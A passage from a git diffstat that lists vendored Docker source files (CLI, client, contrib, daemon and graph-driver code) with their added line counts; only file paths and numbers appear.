29 + .../docker/cli/command/service/create.go | 100 + .../docker/cli/command/service/inspect.go | 84 + .../cli/command/service/inspect_test.go | 129 + .../docker/docker/cli/command/service/list.go | 158 + .../docker/docker/cli/command/service/logs.go | 163 + .../docker/docker/cli/command/service/opts.go | 648 ++ .../docker/cli/command/service/opts_test.go | 107 + .../docker/cli/command/service/parse.go | 68 + .../docker/docker/cli/command/service/ps.go | 76 + .../docker/cli/command/service/remove.go | 47 + .../docker/cli/command/service/scale.go | 96 + .../docker/cli/command/service/trust.go | 96 + .../docker/cli/command/service/update.go | 849 ++ .../docker/cli/command/service/update_test.go | 384 + .../docker/docker/cli/command/stack/cmd.go | 35 + .../docker/docker/cli/command/stack/common.go | 60 + .../docker/docker/cli/command/stack/deploy.go | 357 + .../cli/command/stack/deploy_bundlefile.go | 83 + .../docker/docker/cli/command/stack/list.go | 113 + .../docker/docker/cli/command/stack/opts.go | 49 + .../docker/docker/cli/command/stack/ps.go | 61 + .../docker/docker/cli/command/stack/remove.go | 112 + .../docker/cli/command/stack/services.go | 79 + .../docker/docker/cli/command/swarm/cmd.go | 28 + .../docker/docker/cli/command/swarm/init.go | 85 + .../docker/docker/cli/command/swarm/join.go | 69 + .../docker/cli/command/swarm/join_token.go | 105 + .../docker/docker/cli/command/swarm/leave.go | 44 + .../docker/docker/cli/command/swarm/opts.go | 209 + .../docker/cli/command/swarm/opts_test.go | 37 + .../docker/docker/cli/command/swarm/unlock.go | 54 + .../docker/cli/command/swarm/unlock_key.go | 79 + .../docker/docker/cli/command/swarm/update.go | 72 + .../docker/docker/cli/command/system/cmd.go | 26 + .../docker/docker/cli/command/system/df.go | 56 + .../docker/cli/command/system/events.go | 140 + .../docker/docker/cli/command/system/info.go | 334 + .../docker/cli/command/system/inspect.go | 203 + .../docker/docker/cli/command/system/prune.go | 93 + .../docker/cli/command/system/version.go | 113 + .../docker/docker/cli/command/task/print.go | 161 + .../docker/docker/cli/command/trust.go | 39 + .../docker/docker/cli/command/utils.go | 87 + .../docker/docker/cli/command/volume/cmd.go | 45 + .../docker/cli/command/volume/create.go | 111 + .../docker/cli/command/volume/inspect.go | 55 + .../docker/docker/cli/command/volume/list.go | 91 + .../docker/docker/cli/command/volume/prune.go | 75 + .../docker/cli/command/volume/remove.go | 68 + .../docker/cli/compose/convert/compose.go | 116 + .../cli/compose/convert/compose_test.go | 122 + .../docker/cli/compose/convert/service.go | 416 + .../cli/compose/convert/service_test.go | 216 + .../docker/cli/compose/convert/volume.go | 128 + .../docker/cli/compose/convert/volume_test.go | 133 + .../compose/interpolation/interpolation.go | 90 + .../interpolation/interpolation_test.go | 59 + .../docker/cli/compose/loader/example1.env | 8 + .../docker/cli/compose/loader/example2.env | 1 + .../cli/compose/loader/full-example.yml | 287 + .../docker/cli/compose/loader/loader.go | 653 ++ .../docker/cli/compose/loader/loader_test.go | 800 ++ .../docker/cli/compose/schema/bindata.go | 260 + .../schema/data/config_schema_v3.0.json | 383 + .../schema/data/config_schema_v3.1.json | 428 + .../docker/cli/compose/schema/schema.go | 137 + .../docker/cli/compose/schema/schema_test.go | 52 + .../docker/cli/compose/template/template.go | 100 + .../cli/compose/template/template_test.go | 83 + .../docker/docker/cli/compose/types/types.go | 253 + vendor/github.com/docker/docker/cli/error.go | 33 + .../docker/docker/cli/flags/client.go | 13 + .../docker/docker/cli/flags/common.go | 120 + .../docker/docker/cli/flags/common_test.go | 42 + .../github.com/docker/docker/cli/required.go | 96 + .../docker/docker/cli/trust/trust.go | 232 + .../docker/docker/cliconfig/config.go | 120 + .../docker/docker/cliconfig/config_test.go | 621 ++ .../docker/cliconfig/configfile/file.go | 183 + .../docker/cliconfig/configfile/file_test.go | 27 + .../cliconfig/credentials/credentials.go | 17 + .../cliconfig/credentials/default_store.go | 22 + .../credentials/default_store_darwin.go | 3 + .../credentials/default_store_linux.go | 3 + .../credentials/default_store_unsupported.go | 5 + .../credentials/default_store_windows.go | 3 + .../cliconfig/credentials/file_store.go | 53 + .../cliconfig/credentials/file_store_test.go | 139 + .../cliconfig/credentials/native_store.go | 144 + .../credentials/native_store_test.go | 355 + .../github.com/docker/docker/client/README.md | 35 + .../docker/docker/client/checkpoint_create.go | 13 + .../docker/client/checkpoint_create_test.go | 73 + .../docker/docker/client/checkpoint_delete.go | 20 + .../docker/client/checkpoint_delete_test.go | 54 + .../docker/docker/client/checkpoint_list.go | 28 + .../docker/client/checkpoint_list_test.go | 57 + .../github.com/docker/docker/client/client.go | 246 + .../docker/docker/client/client_mock_test.go | 45 + .../docker/docker/client/client_test.go | 283 + .../docker/docker/client/client_unix.go | 6 + .../docker/docker/client/client_windows.go | 4 + .../docker/docker/client/container_attach.go | 37 + .../docker/docker/client/container_commit.go | 53 + .../docker/client/container_commit_test.go | 96 + .../docker/docker/client/container_copy.go | 97 + .../docker/client/container_copy_test.go | 244 + .../docker/docker/client/container_create.go | 50 + .../docker/client/container_create_test.go | 76 + .../docker/docker/client/container_diff.go | 23 + .../docker/client/container_diff_test.go | 61 + .../docker/docker/client/container_exec.go | 54 + .../docker/client/container_exec_test.go | 157 + .../docker/docker/client/container_export.go | 20 + .../docker/client/container_export_test.go | 50 + .../docker/docker/client/container_inspect.go | 54 + .../docker/client/container_inspect_test.go | 125 + .../docker/docker/client/container_kill.go | 17 + .../docker/client/container_kill_test.go | 46 + .../docker/docker/client/container_list.go | 56 + .../docker/client/container_list_test.go | 96 + .../docker/docker/client/container_logs.go | 52 + .../docker/client/container_logs_test.go | 133 + .../docker/docker/client/container_pause.go | 10 + .../docker/client/container_pause_test.go | 41 + .../docker/docker/client/container_prune.go | 36 + .../docker/docker/client/container_remove.go | 27 + .../docker/client/container_remove_test.go | 59 + .../docker/docker/client/container_rename.go | 16 + .../docker/client/container_rename_test.go | 46 + .../docker/docker/client/container_resize.go | 29 + .../docker/client/container_resize_test.go | 82 + .../docker/docker/client/container_restart.go | 22 + .../docker/client/container_restart_test.go | 48 + .../docker/docker/client/container_start.go | 24 + .../docker/client/container_start_test.go | 58 + .../docker/docker/client/container_stats.go | 26 + .../docker/client/container_stats_test.go | 70 + .../docker/docker/client/container_stop.go | 21 + .../docker/client/container_stop_test.go | 48 + .../docker/docker/client/container_top.go | 28 + .../docker/client/container_top_test.go | 74 + .../docker/docker/client/container_unpause.go | 10 + .../docker/client/container_unpause_test.go | 41 + .../docker/docker/client/container_update.go | 22 + .../docker/client/container_update_test.go | 58 + .../docker/docker/client/container_wait.go | 26 + .../docker/client/container_wait_test.go | 70 + .../docker/docker/client/disk_usage.go | 26 + .../github.com/docker/docker/client/errors.go | 278 + .../github.com/docker/docker/client/events.go | 102 + .../docker/docker/client/events_test.go | 165 + .../github.com/docker/docker/client/hijack.go | 177 + .../docker/docker/client/image_build.go | 123 + .../docker/docker/client/image_build_test.go | 233 + .../docker/docker/client/image_create.go | 34 + .../docker/docker/client/image_create_test.go | 76 + .../docker/docker/client/image_history.go | 22 + .../docker/client/image_history_test.go | 60 + .../docker/docker/client/image_import.go | 37 + .../docker/docker/client/image_import_test.go | 81 + .../docker/docker/client/image_inspect.go | 33 + .../docker/client/image_inspect_test.go | 71 + .../docker/docker/client/image_list.go | 45 + .../docker/docker/client/image_list_test.go | 159 + .../docker/docker/client/image_load.go | 30 + .../docker/docker/client/image_load_test.go | 95 + .../docker/docker/client/image_prune.go | 36 + .../docker/docker/client/image_pull.go | 46 + .../docker/docker/client/image_pull_test.go | 199 + .../docker/docker/client/image_push.go | 54 + .../docker/docker/client/image_push_test.go | 180 + .../docker/docker/client/image_remove.go | 31 + .../docker/docker/client/image_remove_test.go | 95 + .../docker/docker/client/image_save.go | 22 + .../docker/docker/client/image_save_test.go | 58 + .../docker/docker/client/image_search.go | 51 + .../docker/docker/client/image_search_test.go | 165 + .../docker/docker/client/image_tag.go | 34 + .../docker/docker/client/image_tag_test.go | 121 + .../github.com/docker/docker/client/info.go | 26 + .../docker/docker/client/info_test.go | 76 + .../docker/docker/client/interface.go | 171 + .../docker/client/interface_experimental.go | 17 + .../docker/docker/client/interface_stable.go | 10 + .../github.com/docker/docker/client/login.go | 29 + .../docker/docker/client/network_connect.go | 18 + .../docker/client/network_connect_test.go | 107 + .../docker/docker/client/network_create.go | 25 + .../docker/client/network_create_test.go | 72 + .../docker/client/network_disconnect.go | 14 + .../docker/client/network_disconnect_test.go | 64 + .../docker/docker/client/network_inspect.go | 38 + .../docker/client/network_inspect_test.go | 69 + .../docker/docker/client/network_list.go | 31 + .../docker/docker/client/network_list_test.go | 108 + .../docker/docker/client/network_prune.go | 36 + .../docker/docker/client/network_remove.go | 10 + .../docker/client/network_remove_test.go | 47 + .../docker/docker/client/node_inspect.go | 33 + .../docker/docker/client/node_inspect_test.go | 65 + .../docker/docker/client/node_list.go | 36 + .../docker/docker/client/node_list_test.go | 94 + .../docker/docker/client/node_remove.go | 21 + .../docker/docker/client/node_remove_test.go | 69 + .../docker/docker/client/node_update.go | 18 + .../docker/docker/client/node_update_test.go | 49 + .../github.com/docker/docker/client/ping.go | 30 + .../docker/docker/client/plugin_create.go | 26 + .../docker/docker/client/plugin_disable.go | 19 + .../docker/client/plugin_disable_test.go | 48 + .../docker/docker/client/plugin_enable.go | 19 + .../docker/client/plugin_enable_test.go | 48 + .../docker/docker/client/plugin_inspect.go | 32 + .../docker/client/plugin_inspect_test.go | 54 + .../docker/docker/client/plugin_install.go | 113 + .../docker/docker/client/plugin_list.go | 21 + .../docker/docker/client/plugin_list_test.go | 59 + .../docker/docker/client/plugin_push.go | 17 + .../docker/docker/client/plugin_push_test.go | 51 + .../docker/docker/client/plugin_remove.go | 20 + .../docker/client/plugin_remove_test.go | 49 + .../docker/docker/client/plugin_set.go | 12 + .../docker/docker/client/plugin_set_test.go | 47 + .../docker/docker/client/plugin_upgrade.go | 37 + .../docker/docker/client/request.go | 247 + .../docker/docker/client/request_test.go | 92 + .../docker/docker/client/secret_create.go | 24 + .../docker/client/secret_create_test.go | 57 + .../docker/docker/client/secret_inspect.go | 34 + .../docker/client/secret_inspect_test.go | 65 + .../docker/docker/client/secret_list.go | 35 + .../docker/docker/client/secret_list_test.go | 94 + .../docker/docker/client/secret_remove.go | 10 + .../docker/client/secret_remove_test.go | 47 + .../docker/docker/client/secret_update.go | 19 + .../docker/client/secret_update_test.go | 49 + .../docker/docker/client/service_create.go | 30 + .../docker/client/service_create_test.go | 57 + .../docker/docker/client/service_inspect.go | 33 + .../docker/client/service_inspect_test.go | 65 + .../docker/docker/client/service_list.go | 35 + .../docker/docker/client/service_list_test.go | 94 + .../docker/docker/client/service_logs.go | 52 + .../docker/docker/client/service_logs_test.go | 133 + .../docker/docker/client/service_remove.go | 10 + .../docker/client/service_remove_test.go | 47 + .../docker/docker/client/service_update.go | 41 + .../docker/client/service_update_test.go | 77 + .../docker/client/swarm_get_unlock_key.go | 21 + .../docker/docker/client/swarm_init.go | 21 + .../docker/docker/client/swarm_init_test.go | 54 + .../docker/docker/client/swarm_inspect.go | 21 + .../docker/client/swarm_inspect_test.go | 56 + .../docker/docker/client/swarm_join.go | 13 + .../docker/docker/client/swarm_join_test.go | 51 + .../docker/docker/client/swarm_leave.go | 18 + .../docker/docker/client/swarm_leave_test.go | 66 + .../docker/docker/client/swarm_unlock.go | 17 + .../docker/docker/client/swarm_update.go | 22 + .../docker/docker/client/swarm_update_test.go | 49 + .../docker/docker/client/task_inspect.go | 34 + .../docker/docker/client/task_inspect_test.go | 54 + .../docker/docker/client/task_list.go | 35 + .../docker/docker/client/task_list_test.go | 94 + .../docker/docker/client/testdata/ca.pem | 18 + .../docker/docker/client/testdata/cert.pem | 18 + .../docker/docker/client/testdata/key.pem | 27 + .../docker/docker/client/transport.go | 28 + .../github.com/docker/docker/client/utils.go | 33 + .../docker/docker/client/version.go | 21 + .../docker/docker/client/volume_create.go | 21 + .../docker/client/volume_create_test.go | 75 + .../docker/docker/client/volume_inspect.go | 38 + .../docker/client/volume_inspect_test.go | 76 + .../docker/docker/client/volume_list.go | 32 + .../docker/docker/client/volume_list_test.go | 98 + .../docker/docker/client/volume_prune.go | 36 + .../docker/docker/client/volume_remove.go | 21 + .../docker/client/volume_remove_test.go | 47 + .../docker/docker/cmd/docker/daemon_none.go | 27 + .../docker/cmd/docker/daemon_none_test.go | 17 + .../docker/cmd/docker/daemon_unit_test.go | 30 + .../docker/docker/cmd/docker/daemon_unix.go | 79 + .../docker/docker/cmd/docker/docker.go | 180 + .../docker/docker/cmd/docker/docker_test.go | 32 + .../docker/cmd/docker/docker_windows.go | 18 + .../docker/docker/cmd/dockerd/README.md | 3 + .../docker/docker/cmd/dockerd/daemon.go | 524 ++ .../docker/cmd/dockerd/daemon_freebsd.go | 5 + .../docker/docker/cmd/dockerd/daemon_linux.go | 11 + .../docker/cmd/dockerd/daemon_solaris.go | 85 + .../docker/docker/cmd/dockerd/daemon_test.go | 145 + .../docker/docker/cmd/dockerd/daemon_unix.go | 137 + .../docker/cmd/dockerd/daemon_unix_test.go | 114 + .../docker/cmd/dockerd/daemon_windows.go | 92 + .../docker/docker/cmd/dockerd/docker.go | 110 + .../docker/cmd/dockerd/docker_windows.go | 18 + .../dockerd/hack/malformed_host_override.go | 121 + .../hack/malformed_host_override_test.go | 124 + .../docker/docker/cmd/dockerd/metrics.go | 27 + .../docker/cmd/dockerd/service_unsupported.go | 14 + .../docker/cmd/dockerd/service_windows.go | 426 + .../docker/docker/container/archive.go | 76 + .../docker/docker/container/container.go | 1103 +++ .../docker/container/container_linux.go | 9 + .../docker/container/container_notlinux.go | 23 + .../docker/container/container_unit_test.go | 60 + .../docker/docker/container/container_unix.go | 448 + .../docker/container/container_windows.go | 111 + .../docker/docker/container/health.go | 49 + .../docker/docker/container/history.go | 30 + .../docker/docker/container/memory_store.go | 95 + .../docker/container/memory_store_test.go | 106 + .../docker/docker/container/monitor.go | 46 + .../docker/docker/container/mounts_unix.go | 12 + .../docker/docker/container/mounts_windows.go | 8 + .../docker/docker/container/state.go | 343 + .../docker/docker/container/state_solaris.go | 7 + .../docker/docker/container/state_test.go | 113 + .../docker/docker/container/state_unix.go | 10 + .../docker/docker/container/state_windows.go | 7 + .../docker/docker/container/store.go | 28 + .../docker/docker/container/stream/streams.go | 143 + .../docker/docker/contrib/README.md | 4 + .../docker/docker/contrib/REVIEWERS | 1 + .../docker/docker/contrib/apparmor/main.go | 56 + .../docker/contrib/apparmor/template.go | 268 + .../contrib/builder/deb/aarch64/build.sh | 10 + .../contrib/builder/deb/aarch64/generate.sh | 118 + .../deb/aarch64/ubuntu-trusty/Dockerfile | 24 + .../deb/aarch64/ubuntu-xenial/Dockerfile | 22 + .../contrib/builder/deb/amd64/README.md | 5 + .../docker/contrib/builder/deb/amd64/build.sh | 10 + .../deb/amd64/debian-jessie/Dockerfile | 20 + .../deb/amd64/debian-stretch/Dockerfile | 20 + .../deb/amd64/debian-wheezy/Dockerfile | 22 + .../contrib/builder/deb/amd64/generate.sh | 149 + .../deb/amd64/ubuntu-precise/Dockerfile | 16 + .../deb/amd64/ubuntu-trusty/Dockerfile | 16 + .../deb/amd64/ubuntu-xenial/Dockerfile | 16 + .../deb/amd64/ubuntu-yakkety/Dockerfile | 16 + .../deb/armhf/debian-jessie/Dockerfile | 20 + .../contrib/builder/deb/armhf/generate.sh | 158 + .../deb/armhf/raspbian-jessie/Dockerfile | 22 + .../deb/armhf/ubuntu-trusty/Dockerfile | 16 + .../deb/armhf/ubuntu-xenial/Dockerfile | 16 + .../deb/armhf/ubuntu-yakkety/Dockerfile | 16 + .../contrib/builder/deb/ppc64le/build.sh | 10 + .../contrib/builder/deb/ppc64le/generate.sh | 103 + .../deb/ppc64le/ubuntu-trusty/Dockerfile | 16 + .../deb/ppc64le/ubuntu-xenial/Dockerfile | 16 + .../deb/ppc64le/ubuntu-yakkety/Dockerfile | 16 + .../docker/contrib/builder/deb/s390x/build.sh | 10 + .../contrib/builder/deb/s390x/generate.sh | 96 + .../deb/s390x/ubuntu-xenial/Dockerfile | 16 + .../contrib/builder/rpm/amd64/README.md | 5 + .../docker/contrib/builder/rpm/amd64/build.sh | 10 + .../builder/rpm/amd64/centos-7/Dockerfile | 19 + .../builder/rpm/amd64/fedora-24/Dockerfile | 19 + .../builder/rpm/amd64/fedora-25/Dockerfile | 19 + .../contrib/builder/rpm/amd64/generate.sh | 189 + .../rpm/amd64/opensuse-13.2/Dockerfile | 18 + .../rpm/amd64/oraclelinux-6/Dockerfile | 28 + .../rpm/amd64/oraclelinux-7/Dockerfile | 18 + .../builder/rpm/amd64/photon-1.0/Dockerfile | 18 + .../docker/docker/contrib/check-config.sh | 354 + .../docker/contrib/completion/REVIEWERS | 2 + .../docker/contrib/completion/bash/docker | 4282 +++++++++ .../contrib/completion/fish/docker.fish | 405 + .../contrib/completion/powershell/readme.txt | 1 + .../docker/contrib/completion/zsh/REVIEWERS | 2 + .../docker/contrib/completion/zsh/_docker | 2787 ++++++ .../contrib/desktop-integration/README.md | 11 + .../desktop-integration/chromium/Dockerfile | 36 + .../desktop-integration/gparted/Dockerfile | 31 + .../contrib/docker-device-tool/README.md | 14 + .../contrib/docker-device-tool/device_tool.go | 176 + .../docker-device-tool/device_tool_windows.go | 4 + .../docker/docker/contrib/dockerize-disk.sh | 118 + .../contrib/download-frozen-image-v1.sh | 108 + .../contrib/download-frozen-image-v2.sh | 121 + .../docker/docker/contrib/editorconfig | 13 + .../docker/docker/contrib/gitdm/aliases | 148 + .../docker/docker/contrib/gitdm/domain-map | 39 + .../docker/contrib/gitdm/generate_aliases.sh | 16 + .../docker/docker/contrib/gitdm/gitdm.config | 17 + .../docker/contrib/httpserver/Dockerfile | 4 + .../contrib/httpserver/Dockerfile.solaris | 4 + .../docker/contrib/httpserver/server.go | 12 + .../docker/contrib/init/openrc/docker.confd | 13 + .../docker/contrib/init/openrc/docker.initd | 22 + .../docker/contrib/init/systemd/REVIEWERS | 3 + .../contrib/init/systemd/docker.service | 29 + .../contrib/init/systemd/docker.service.rpm | 28 + .../docker/contrib/init/systemd/docker.socket | 12 + .../contrib/init/sysvinit-debian/docker | 152 + .../init/sysvinit-debian/docker.default | 20 + .../contrib/init/sysvinit-redhat/docker | 153 + .../init/sysvinit-redhat/docker.sysconfig | 7 + .../docker/contrib/init/upstart/REVIEWERS | 2 + .../docker/contrib/init/upstart/docker.conf | 72 + .../docker/contrib/mac-install-bundle.sh | 45 + .../docker/docker/contrib/mkimage-alpine.sh | 87 + .../docker/contrib/mkimage-arch-pacman.conf | 92 + .../docker/docker/contrib/mkimage-arch.sh | 126 + .../contrib/mkimage-archarm-pacman.conf | 98 + .../docker/docker/contrib/mkimage-busybox.sh | 43 + .../docker/docker/contrib/mkimage-crux.sh | 75 + .../docker/contrib/mkimage-debootstrap.sh | 297 + .../docker/docker/contrib/mkimage-pld.sh | 73 + .../docker/docker/contrib/mkimage-rinse.sh | 123 + .../docker/docker/contrib/mkimage-yum.sh | 136 + .../docker/docker/contrib/mkimage.sh | 128 + .../contrib/mkimage/.febootstrap-minimize | 28 + .../docker/contrib/mkimage/busybox-static | 34 + .../docker/docker/contrib/mkimage/debootstrap | 226 + .../docker/contrib/mkimage/mageia-urpmi | 61 + .../docker/docker/contrib/mkimage/rinse | 25 + .../docker/docker/contrib/mkimage/solaris | 89 + .../docker/docker/contrib/nnp-test/Dockerfile | 9 + .../docker/docker/contrib/nnp-test/nnp-test.c | 10 + .../docker/contrib/nuke-graph-directory.sh | 64 + .../docker/docker/contrib/project-stats.sh | 22 + .../docker/docker/contrib/report-issue.sh | 105 + .../docker/docker/contrib/reprepro/suites.sh | 12 + .../docker-engine-selinux/LICENSE | 339 + .../docker-engine-selinux/Makefile | 23 + .../docker-engine-selinux/README.md | 1 + .../docker-engine-selinux/docker.fc | 29 + .../docker-engine-selinux/docker.if | 523 ++ .../docker-engine-selinux/docker.te | 399 + .../docker-engine-selinux/LICENSE | 339 + .../docker-engine-selinux/Makefile | 23 + .../docker-engine-selinux/README.md | 1 + .../docker-engine-selinux/docker.fc | 33 + .../docker-engine-selinux/docker.if | 659 ++ .../docker-engine-selinux/docker.te | 465 + .../selinux/docker-engine-selinux/LICENSE | 340 + .../selinux/docker-engine-selinux/Makefile | 16 + .../selinux/docker-engine-selinux/docker.fc | 18 + .../selinux/docker-engine-selinux/docker.if | 461 + .../selinux/docker-engine-selinux/docker.te | 407 + .../docker-engine-selinux/docker_selinux.8.gz | Bin 0 -> 2847 bytes .../contrib/syntax/nano/Dockerfile.nanorc | 26 + .../docker/contrib/syntax/nano/README.md | 32 + .../Preferences/Dockerfile.tmPreferences | 24 + .../Syntaxes/Dockerfile.tmLanguage | 143 + .../textmate/Docker.tmbundle/info.plist | 16 + .../docker/contrib/syntax/textmate/README.md | 17 + .../docker/contrib/syntax/textmate/REVIEWERS | 1 + .../docker/docker/contrib/syntax/vim/LICENSE | 22 + .../docker/contrib/syntax/vim/README.md | 26 + .../contrib/syntax/vim/doc/dockerfile.txt | 18 + .../syntax/vim/ftdetect/dockerfile.vim | 1 + .../contrib/syntax/vim/syntax/dockerfile.vim | 31 + .../docker/contrib/syscall-test/Dockerfile | 15 + .../docker/docker/contrib/syscall-test/acct.c | 16 + .../docker/contrib/syscall-test/exit32.s | 7 + .../docker/docker/contrib/syscall-test/ns.c | 63 + .../docker/docker/contrib/syscall-test/raw.c | 14 + .../docker/contrib/syscall-test/setgid.c | 11 + .../docker/contrib/syscall-test/setuid.c | 11 + .../docker/contrib/syscall-test/socket.c | 30 + .../docker/contrib/syscall-test/userns.c | 63 + .../docker/contrib/udev/80-docker.rules | 3 + .../docker/contrib/vagrant-docker/README.md | 50 + .../docker/docker/daemon/apparmor_default.go | 36 + .../daemon/apparmor_default_unsupported.go | 7 + .../docker/docker/daemon/archive.go | 436 + .../docker/docker/daemon/archive_unix.go | 58 + .../docker/docker/daemon/archive_windows.go | 18 + .../github.com/docker/docker/daemon/attach.go | 147 + .../github.com/docker/docker/daemon/auth.go | 13 + .../docker/docker/daemon/bindmount_solaris.go | 5 + .../docker/docker/daemon/bindmount_unix.go | 5 + .../github.com/docker/docker/daemon/cache.go | 254 + .../docker/docker/daemon/caps/utils_unix.go | 131 + .../docker/docker/daemon/changes.go | 31 + .../docker/docker/daemon/checkpoint.go | 110 + .../docker/docker/daemon/cluster.go | 12 + .../docker/docker/daemon/cluster/cluster.go | 1973 +++++ .../daemon/cluster/convert/container.go | 235 + .../docker/daemon/cluster/convert/network.go | 210 + .../docker/daemon/cluster/convert/node.go | 89 + .../docker/daemon/cluster/convert/secret.go | 64 + .../docker/daemon/cluster/convert/service.go | 366 + .../docker/daemon/cluster/convert/swarm.go | 122 + .../docker/daemon/cluster/convert/task.go | 81 + .../docker/daemon/cluster/executor/backend.go | 61 + .../cluster/executor/container/adapter.go | 463 + .../cluster/executor/container/attachment.go | 81 + .../cluster/executor/container/container.go | 598 ++ .../cluster/executor/container/controller.go | 672 ++ .../cluster/executor/container/errors.go | 15 + .../cluster/executor/container/executor.go | 194 + .../cluster/executor/container/health_test.go | 102 + .../cluster/executor/container/validate.go | 39 + .../executor/container/validate_test.go | 141 + .../executor/container/validate_unix_test.go | 8 + .../container/validate_windows_test.go | 8 + .../docker/docker/daemon/cluster/filters.go | 116 + .../docker/docker/daemon/cluster/helpers.go | 108 + .../docker/daemon/cluster/listen_addr.go | 278 + .../daemon/cluster/listen_addr_linux.go | 91 + .../daemon/cluster/listen_addr_others.go | 9 + .../daemon/cluster/listen_addr_solaris.go | 57 + .../docker/daemon/cluster/provider/network.go | 37 + .../docker/docker/daemon/cluster/secrets.go | 133 + .../github.com/docker/docker/daemon/commit.go | 271 + .../github.com/docker/docker/daemon/config.go | 525 ++ .../docker/daemon/config_common_unix.go | 90 + .../docker/daemon/config_experimental.go | 8 + .../docker/docker/daemon/config_solaris.go | 47 + .../docker/docker/daemon/config_test.go | 229 + .../docker/docker/daemon/config_unix.go | 104 + .../docker/docker/daemon/config_unix_test.go | 80 + .../docker/docker/daemon/config_windows.go | 71 + .../docker/daemon/config_windows_test.go | 59 + .../docker/docker/daemon/container.go | 282 + .../docker/daemon/container_operations.go | 1049 +++ .../daemon/container_operations_solaris.go | 46 + .../daemon/container_operations_unix.go | 281 + .../daemon/container_operations_windows.go | 59 + .../github.com/docker/docker/daemon/create.go | 290 + .../docker/docker/daemon/create_unix.go | 81 + .../docker/docker/daemon/create_windows.go | 80 + .../github.com/docker/docker/daemon/daemon.go | 1321 +++ .../docker/daemon/daemon_experimental.go | 7 + .../docker/docker/daemon/daemon_linux.go | 80 + .../docker/docker/daemon/daemon_linux_test.go | 104 + .../docker/docker/daemon/daemon_solaris.go | 523 ++ .../docker/docker/daemon/daemon_test.go | 627 ++ .../docker/docker/daemon/daemon_unix.go | 1237 +++ .../docker/docker/daemon/daemon_unix_test.go | 283 + .../docker/daemon/daemon_unsupported.go | 5 + .../docker/docker/daemon/daemon_windows.go | 604 ++ .../docker/docker/daemon/debugtrap.go | 62 + .../docker/docker/daemon/debugtrap_unix.go | 33 + .../docker/daemon/debugtrap_unsupported.go | 7 + .../docker/docker/daemon/debugtrap_windows.go | 52 + .../github.com/docker/docker/daemon/delete.go | 168 + .../docker/docker/daemon/delete_test.go | 43 + .../docker/docker/daemon/discovery.go | 215 + .../docker/docker/daemon/discovery_test.go | 164 + .../docker/docker/daemon/disk_usage.go | 100 + .../github.com/docker/docker/daemon/errors.go | 57 + .../github.com/docker/docker/daemon/events.go | 132 + .../docker/docker/daemon/events/events.go | 158 + .../docker/daemon/events/events_test.go | 275 + .../docker/docker/daemon/events/filter.go | 110 + .../docker/docker/daemon/events/metrics.go | 15 + .../daemon/events/testutils/testutils.go | 76 + .../docker/docker/daemon/events_test.go | 94 + .../github.com/docker/docker/daemon/exec.go | 280 + .../docker/docker/daemon/exec/exec.go | 118 + .../docker/docker/daemon/exec_linux.go | 27 + .../docker/docker/daemon/exec_solaris.go | 11 + .../docker/docker/daemon/exec_windows.go | 14 + .../github.com/docker/docker/daemon/export.go | 60 + .../docker/docker/daemon/getsize_unix.go | 41 + .../docker/daemon/graphdriver/aufs/aufs.go | 669 ++ .../daemon/graphdriver/aufs/aufs_test.go | 802 ++ .../docker/daemon/graphdriver/aufs/dirs.go | 64 + .../docker/daemon/graphdriver/aufs/mount.go | 21 + .../daemon/graphdriver/aufs/mount_linux.go | 7 + .../graphdriver/aufs/mount_unsupported.go | 12 + .../docker/daemon/graphdriver/btrfs/btrfs.go | 530 ++ .../daemon/graphdriver/btrfs/btrfs_test.go | 63 + .../graphdriver/btrfs/dummy_unsupported.go | 3 + .../daemon/graphdriver/btrfs/version.go | 26 + .../daemon/graphdriver/btrfs/version_none.go | 14 + .../daemon/graphdriver/btrfs/version_test.go | 13 + .../docker/daemon/graphdriver/counter.go | 67 + .../daemon/graphdriver/devmapper/README.md | 96 + .../daemon/graphdriver/devmapper/deviceset.go | 2727 ++++++ .../graphdriver/devmapper/devmapper_doc.go | 106 + .../graphdriver/devmapper/devmapper_test.go | 110 + .../daemon/graphdriver/devmapper/driver.go | 231 + .../daemon/graphdriver/devmapper/mount.go | 89 + .../docker/daemon/graphdriver/driver.go | 270 + .../daemon/graphdriver/driver_freebsd.go | 19 + .../docker/daemon/graphdriver/driver_linux.go | 135 + .../daemon/graphdriver/driver_solaris.go | 97 + .../daemon/graphdriver/driver_unsupported.go | 15 + .../daemon/graphdriver/driver_windows.go | 14 + .../docker/daemon/graphdriver/fsdiff.go | 169 + .../graphdriver/graphtest/graphbench_unix.go | 259 + .../graphdriver/graphtest/graphtest_unix.go | 358 + .../graphtest/graphtest_windows.go | 1 + .../daemon/graphdriver/graphtest/testutil.go | 342 + .../graphdriver/graphtest/testutil_unix.go | 143 + .../docker/daemon/graphdriver/overlay/copy.go | 174 + .../daemon/graphdriver/overlay/overlay.go | 462 + .../graphdriver/overlay/overlay_test.go | 93 + .../overlay/overlay_unsupported.go | 3 + .../daemon/graphdriver/overlay2/check.go | 79 + .../daemon/graphdriver/overlay2/mount.go | 88 + .../daemon/graphdriver/overlay2/overlay.go | 662 ++ .../graphdriver/overlay2/overlay_test.go | 121 + .../overlay2/overlay_unsupported.go | 3 + .../daemon/graphdriver/overlay2/randomid.go | 80 + .../graphdriver/overlayutils/overlayutils.go | 18 + .../docker/daemon/graphdriver/plugin.go | 43 + .../docker/docker/daemon/graphdriver/proxy.go | 252 + .../daemon/graphdriver/quota/projectquota.go | 339 + .../graphdriver/register/register_aufs.go | 8 + .../graphdriver/register/register_btrfs.go | 8 + .../register/register_devicemapper.go | 8 + .../graphdriver/register/register_overlay.go | 9 + .../graphdriver/register/register_vfs.go | 6 + .../graphdriver/register/register_windows.go | 6 + .../graphdriver/register/register_zfs.go | 8 + .../docker/daemon/graphdriver/vfs/driver.go | 145 + .../docker/daemon/graphdriver/vfs/vfs_test.go | 37 + .../daemon/graphdriver/windows/windows.go | 886 ++ .../docker/daemon/graphdriver/zfs/MAINTAINERS | 2 + .../docker/daemon/graphdriver/zfs/zfs.go | 417 + .../daemon/graphdriver/zfs/zfs_freebsd.go | 38 + .../daemon/graphdriver/zfs/zfs_linux.go | 27 + .../daemon/graphdriver/zfs/zfs_solaris.go | 59 + .../docker/daemon/graphdriver/zfs/zfs_test.go | 35 + .../daemon/graphdriver/zfs/zfs_unsupported.go | 11 + .../github.com/docker/docker/daemon/health.go | 341 + .../docker/docker/daemon/health_test.go | 118 + .../github.com/docker/docker/daemon/image.go | 76 + .../docker/docker/daemon/image_delete.go | 412 + .../docker/docker/daemon/image_exporter.go | 25 + .../docker/docker/daemon/image_history.go | 84 + .../docker/docker/daemon/image_inspect.go | 82 + .../docker/docker/daemon/image_pull.go | 149 + 